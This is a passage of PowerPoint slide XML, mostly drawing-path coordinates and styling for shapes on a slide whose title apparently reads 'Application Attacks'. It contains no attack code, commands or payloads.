                  <a:pt x="2067991" y="79908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2115134" y="78320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2162314" y="77787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2209482" y="78320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2256625" y="79908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2303742" y="82550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2350795" y="86245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2397772" y="90995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2444648" y="96799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2491422" y="103657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2538057" y="111582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2584539" y="120561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2630843" y="130581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2676969" y="141668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2722880" y="153809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2768562" y="167005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2813989" y="181267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2859163" y="196570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2904045" y="212940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2948622" y="230365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2992869" y="248843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3036786" y="268376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3080334" y="288963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3123501" y="310603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3166262" y="333298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3208617" y="357060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3250527" y="381876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3291979" y="407733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3345700" y="354139"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4321809" h="4310380">
                <a:moveTo>
                  <a:pt x="3988828" y="2535237"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3924439" y="2535237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3913314" y="2583103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3900932" y="2630449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3887317" y="2677287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3872496" y="2723578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3856469" y="2769311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3839260" y="2814472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3820896" y="2859036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3801376" y="2902991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3780739" y="2946311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3758996" y="2988983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3736162" y="3030982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3712260" y="3072307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3687292" y="3112922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3661308" y="3152813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3634295" y="3191967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3606292" y="3230372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3577298" y="3267989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3547351" y="3304819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3516465" y="3340836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3484651" y="3376015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3451923" y="3410356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3418319" y="3443821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3383826" y="3476409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3348494" y="3508083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3312325" y="3538855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3275342" y="3568674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3237560" y="3597529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3199003" y="3625418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3159683" y="3652316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3119615" y="3678199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3078835" y="3703053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3037344" y="3726853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2995155" y="3749598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2952305" y="3771252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2908795" y="3791801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2864662" y="3811232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2819908" y="3829520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2774556" y="3846652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2728633" y="3862616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2682138" y="3877386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2635110" y="3890937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2587561" y="3903256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2539504" y="3914330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2539504" y="3978465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2587929" y="3967886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2635859" y="3956075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2683281" y="3943070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2730169" y="3928872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2776512" y="3913505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2822308" y="3896995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2867507" y="3879342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2912122" y="3860584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2956128" y="3840708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2999498" y="3819766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3042221" y="3797744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3084271" y="3774681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3125660" y="3750589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3166338" y="3725468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3206305" y="3699357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3245535" y="3672255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3284029" y="3644201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3321748" y="3615182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3358692" y="3585248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3394824" y="3554387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3430155" y="3522637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3464636" y="3489998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3498278" y="3456508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3531057" y="3422154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3562947" y="3386988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3593922" y="3350996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623995" y="3314217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3653129" y="3276650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3681311" y="3238322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3708514" y="3199257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3734739" y="3159455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759962" y="3118942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3784168" y="3077743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807333" y="3035858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3829443" y="2993313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3850475" y="2950121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3870426" y="2906306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3889273" y="2861881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3907002" y="2816872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3923588" y="2771267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3939006" y="2725115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953268" y="2678417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3966337" y="2631198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3978186" y="2583472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3988828" y="2535237"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4321809" h="4310380">
                <a:moveTo>
                  <a:pt x="3988828" y="1779333"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3978186" y="1730959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3966337" y="1683080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953268" y="1635709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3939006" y="1588871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3923588" y="1542567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3907002" y="1496834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3889273" y="1451673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3870426" y="1407109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3850475" y="1363154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3829443" y="1319834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807333" y="1277150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3784168" y="1235138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759962" y="1193800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3734739" y="1153160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3708514" y="1113243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3681311" y="1074039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3653129" y="1035596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623995" y="997915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3593922" y="961021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3562947" y="924915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3531057" y="889635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3498278" y="855179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3464636" y="821575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3430155" y="788835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3394824" y="756983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3358692" y="726033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3321748" y="695998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3284029" y="666889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3245535" y="638746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3206305" y="611555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3166338" y="585368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3125660" y="560171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3084271" y="535990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3042221" y="512851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2999498" y="490766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2956128" y="469747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2912122" y="449821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2867507" y="430987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2822308" y="413283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2776512" y="396722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2730169" y="381304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2683281" y="367068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2635859" y="354012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2587929" y="342163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2539504" y="331533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2539504" y="395922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2587561" y="407035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2635110" y="419392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2682138" y="432981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2728633" y="447789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2774556" y="463791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2819908" y="480974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2864662" y="499313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2908795" y="518807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2952305" y="539419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2995155" y="561136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3037344" y="583933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3078835" y="607809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3119615" y="632739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3159683" y="658698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3199003" y="685673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3237560" y="713651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3275342" y="742607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3312325" y="772515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3348494" y="803376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3383826" y="835152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3418319" y="867841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3451923" y="901407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3484651" y="935850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3516465" y="971143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3547351" y="1007275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3577298" y="1044219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3606292" y="1081963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3634295" y="1120482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3661308" y="1159764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3687292" y="1199781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3712260" y="1240523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3736162" y="1281976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3758996" y="1324114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3780739" y="1366926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3801376" y="1410385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3820896" y="1454480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3839260" y="1499196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3856469" y="1544497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3872496" y="1590382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3887317" y="1636826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3900932" y="1683816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3913314" y="1731327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3924439" y="1779333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3988828" y="1779333"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4321809" h="4310380">
                <a:moveTo>
                  <a:pt x="4321568" y="2155012"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4321035" y="2107514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4319460" y="2060041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4316831" y="2012607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4313161" y="1965223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4308424" y="1917915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4302658" y="1870710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4295826" y="1823618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4287939" y="1776666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4279011" y="1729867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4269029" y="1683232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4258005" y="1636788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4245927" y="1590560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4232795" y="1544561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4218610" y="1498815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4203369" y="1453324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4187088" y="1408137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4169753" y="1363243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4151376" y="1318679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4131932" y="1274457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4111447" y="1230604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4089908" y="1187132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4067327" y="1144066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4043692" y="1101420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4019004" y="1059205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3993261" y="1017460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3966476" y="976185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3912628" y="1029652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3939082" y="1071791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3964444" y="1114412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3988701" y="1157478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011853" y="1200975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4033901" y="1244892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4054843" y="1289202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4074693" y="1333881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4093438" y="1378915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4111079" y="1424279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4127614" y="1469961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4143057" y="1515935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4157383" y="1562176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4170616" y="1608683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4182745" y="1655406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4193768" y="1702346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4203687" y="1749488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4212514" y="1796783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4220235" y="1844243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4226839" y="1891830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4232364" y="1939531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4236771" y="1987321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4240073" y="2035175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4242282" y="2083092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4243387" y="2131034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4243387" y="2178977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4242282" y="2226919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4240073" y="2274836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4236771" y="2322690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4232364" y="2370480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4226839" y="2418181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4220235" y="2465768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4212514" y="2513228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4203687" y="2560523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4193768" y="2607665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4182745" y="2654604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4170616" y="2701328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4157383" y="2747835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4143057" y="2794076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4127614" y="2840050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4111079" y="2885732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4093438" y="2931096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4074693" y="2976130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4054843" y="3020809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4033901" y="3065119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011853" y="3109036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3988701" y="3152533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3964444" y="3195599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3939082" y="3238220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3912628" y="3280346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3966476" y="3333813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3993261" y="3292551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4019004" y="3250806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4043692" y="3208591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4067327" y="3165945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4089908" y="3122879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4111447" y="3079407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4131932" y="3035554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4151376" y="2991332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4169753" y="2946768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4187088" y="2901873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4203369" y="2856687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4218610" y="2811195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4232795" y="2765450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4245927" y="2719451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4258005" y="2673223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4269029" y="2626779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4279011" y="2580144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4287939" y="2533345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4295826" y="2486393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4302658" y="2439301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4308424" y="2392095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4313161" y="2344788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4316831" y="2297404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4319460" y="2249970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4321035" y="2202497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4321568" y="2155012"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E9AEA2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82003" y="306451"/>
            <a:ext cx="34905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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-8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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks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8047" y="760476"/>
            <a:ext cx="4824984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046470" y="1933193"/>
            <a:ext cx="416179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1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7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pro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ces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tha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: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15995" y="2513076"/>
            <a:ext cx="10497820" cy="1156970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10497819" h="1156970">
                <a:moveTo>
                  <a:pt x="10304525" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="192786" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148596" y="5094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108024" y="19603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72227" y="42367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42367" y="72227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19603" y="108024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5094" y="148596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="963929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5094" y="1008119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19603" y="1048691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42367" y="1084488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72227" y="1114348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108024" y="1137112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148596" y="1151621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192786" y="1156715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10304525" y="1156715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10348715" y="1151621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389287" y="1137112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10425084" y="1114348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10454944" y="1084488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10477708" y="1048691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10492217" y="1008119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497312" y="963929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497312" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10492217" y="148596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10477708" y="108024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10454944" y="72227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10425084" y="42367"/>
                </a:lnTo>
